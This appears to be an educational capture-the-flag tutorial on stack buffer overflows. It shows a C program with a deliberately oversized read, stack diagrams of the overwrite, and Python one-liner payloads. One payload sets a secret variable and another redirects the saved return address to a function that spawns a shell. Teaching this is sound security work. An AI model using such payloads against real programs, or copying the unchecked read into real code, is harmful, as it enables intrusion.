A Buffer Overflow is a vulnerability in which data can be written which exceeds the allocated space, allowing an attacker to overwrite other data.
The simplest and most common buffer overflow is one where the buffer is on the stack. Let’s look at an example.
#include <stdio.h>
int main() {
int secret = 0xdeadbeef;
char name[100] = {0};
read(0, name, 0x100);
if (secret == 0x1337) {
puts("Wow! Here's a secret.");
} else {
puts("I guess you're not cool enough to see my secret");
}
}
There’s a tiny mistake in this program which will allow us to see the secret. name
is decimal 100 bytes, however we’re reading in hex 100 bytes (=256 decimal bytes)! Let’s see how we can use this to our advantage.
If the compiler chose to layout the stack like this:
0xffff006c: 0xf7f7f7f7 // Saved EIP
0xffff0068: 0xffff0100 // Saved EBP
0xffff0064: 0xdeadbeef // secret
...
0xffff0004: 0x0
ESP -> 0xffff0000: 0x0 // name
let’s look at what happens when we read in 0x100 bytes of ‘A’s.
The first decimal 100 bytes are saved properly:
0xffff006c: 0xf7f7f7f7 // Saved EIP
0xffff0068: 0xffff0100 // Saved EBP
0xffff0064: 0xdeadbeef // secret
...
0xffff0004: 0x41414141
ESP -> 0xffff0000: 0x41414141 // name
However when the 101st byte is read in, we see an issue:
0xffff006c: 0xf7f7f7f7 // Saved EIP
0xffff0068: 0xffff0100 // Saved EBP
0xffff0064: 0xdeadbe41 // secret
...
0xffff0004: 0x41414141
ESP -> 0xffff0000: 0x41414141 // name
The least significant byte of secret
has been overwritten! If we follow the next 3 bytes to be read in, we’ll see the entirety of secret
is “clobbered” with our ‘A’s
0xffff006c: 0xf7f7f7f7 // Saved EIP
0xffff0068: 0xffff0100 // Saved EBP
0xffff0064: 0x41414141 // secret
...
0xffff0004: 0x41414141
ESP -> 0xffff0000: 0x41414141 // name
The remaining 152 bytes would continue clobbering values up the stack.
How can we use this to pass the seemingly impossible check in the original program? Well, if we carefully line up our input so that the bytes that overwrite secret
happen to be the bytes that represent 0x1337 in little-endian, we’ll see the secret message.
A small Python one-liner will work nicely: python -c "print 'A'*100 + '\x31\x13\x00\x00'"
This will fill the name
buffer with 100 ‘A’s, then overwrite secret
with the 32-bit little-endian encoding of 0x1337.
As discussed on the stack page, the instruction that the current function should jump to when it is done is also saved on the stack (denoted as “Saved EIP” in the above stack diagrams). If we can overwrite this, we can control where the program jumps after main
finishes running, giving us the ability to control what the program does entirely.
Usually, the end objective in binary exploitation is to get a shell (often called “popping a shell”) on the remote computer. The shell provides us with an easy way to run anything we want on the target computer.
Say there happens to be a nice function that does this defined somewhere else in the program that we normally can’t get to:
void give_shell() {
system("/bin/sh");
}
Well with our buffer overflow knowledge, now we can! All we have to do is overwrite the saved EIP on the stack to the address where give_shell
is. Then, when main returns, it will pop that address off of the stack and jump to it, running give_shell
, and giving us our shell.
Assuming give_shell
is at 0x08048fd0, we could use something like this: python -c "print 'A'*108 + '\xd0\x8f\x04\x08'"
We send 108 ‘A’s to overwrite the 100 bytes that is allocated for name
, the 4 bytes for secret
, and the 4 bytes for the saved EBP. Then we simply send the little-endian form of give_shell
‘s address, and we would get a shell!
This idea is extended on in Return Oriented Programming.